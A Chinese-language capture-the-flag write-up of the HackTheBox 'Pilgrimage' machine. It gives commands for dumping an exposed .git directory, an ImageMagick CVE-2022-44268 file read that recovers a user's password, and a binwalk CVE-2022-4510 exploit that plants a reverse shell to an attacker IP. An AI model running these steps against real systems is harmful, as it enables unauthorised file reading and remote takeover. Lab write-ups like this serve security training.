Pilgrimage - HackMD

# Pilgrimage ## 1.nmap scan ![image](https://hackmd.io/_uploads/S1WKcmw4a.png) sudo vim /etc/hosts 連接網頁可自行創建帳號 ## 2.目錄dump 運用git-dumper儲存網站資料庫 ``` ./git_dumper.py http://pilgrimage.htb/.git git ./git-dumper http://[website.com]/.git [floder] ``` ![image](https://hackmd.io/_uploads/r1TuJcvVa.png) 查看dump結果發現：程式碼利用 ImageMagick（特別是「magick Convert」命令）來調整上傳檔案的大小並將其保存在/shrunk路徑中 ![image](https://hackmd.io/_uploads/rySck5DET.png) 執行magick ``` ./magick -h ./magick -usage ``` 發現版本為7.1.0-49 ![image](https://hackmd.io/_uploads/SkV3l5w4T.png) ## 3.Poc exploit google search "Magick 7.1.0–49" 發現該版本存有CVE-2022-44268 ``` git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc ``` ``` python3 generate.py -f "/etc/passwd" -o exploit.png ``` 將rce寫入圖片 ![image](https://hackmd.io/_uploads/rkx0MqDVp.png) 將圖片上傳並下載 ``` wget http://pilgrimage.htb/shrunk/655a12e96398f.png ``` ![image](https://hackmd.io/_uploads/S1nQX9vEa.png) 識別圖片 ``` identify -verbose xxx.png ``` ![image](https://hackmd.io/_uploads/ryMMNcD4p.png) 運用Cyber Chef解碼 16進制hex解碼 ``` 發現emily:x:1000:1000:emily,,,:/home/emily:/bin/bash ``` ![image](https://hackmd.io/_uploads/rJHer5wVT.png) 查看dashboard.php 發現位於/var/db/pilgrimage 的SQLite 資料庫的SQL查詢 ![image](https://hackmd.io/_uploads/Hyb5ScDNp.png) 再次使用CVE-2022-44268查看db資料庫 ``` python3 generate.py -f "/var/db/pilgrimage" -o abc.png ``` ![image](https://hackmd.io/_uploads/r19MI9w4p.png) ![image](https://hackmd.io/_uploads/ryMrDcPNa.png) 發現emily用戶密碼(abigchonkyboi123) ## 4.ssh login cat user.txt (flag1) ![image](https://hackmd.io/_uploads/SySsucwVT.png) ## 5.提權 ``` ps -aux ``` ps查看程序發現root執行/bin/bash /usr/sbin/malwarescan.sh ![image](https://hackmd.io/_uploads/rkXExiv46.png) cat /usr/sbin/malwarescan.sh ![image](https://hackmd.io/_uploads/Sk9RfjwET.png) 發現具有關聯性的檔案 /var/www/pilgrimage.htb/shrunk/ /usr/local/bin/binwalk ``` search: malwarescan.sh /var/www/pilgrimage.htb/shrunk/ 獲得解釋 ``` 運行binwalk為v2.3.2版本 google search "binwalk v2.3.2" 發現該版本具有CVE-2022-4510 ![image](https://hackmd.io/_uploads/B1-P7oPVT.png) ## 6.運用exploit-db ![image](https://hackmd.io/_uploads/SJWNNivVp.png) ``` nano [filename].py ``` ![image](https://hackmd.io/_uploads/SJEgrjD46.png) 複製圖片到exp.py同目錄下進行運用將惡意程式及Reverse Shell寫入圖片 ``` python3 exp.py exploit.png 10.10.14.47 9991 ``` ![image](https://hackmd.io/_uploads/SyNyDiPVp.png) 將產製的新圖片上傳http server 於/var/www/pilgrimage.htb/shrunk目錄下載 ``` wget http://10.10.14.47:8081/binwalk_exploit.png ``` ![image](https://hackmd.io/_uploads/B1GbtjDET.png) 完成下載＝成功反連 ![image](https://hackmd.io/_uploads/HJhO_jv4p.png) cat root.txt (flag2)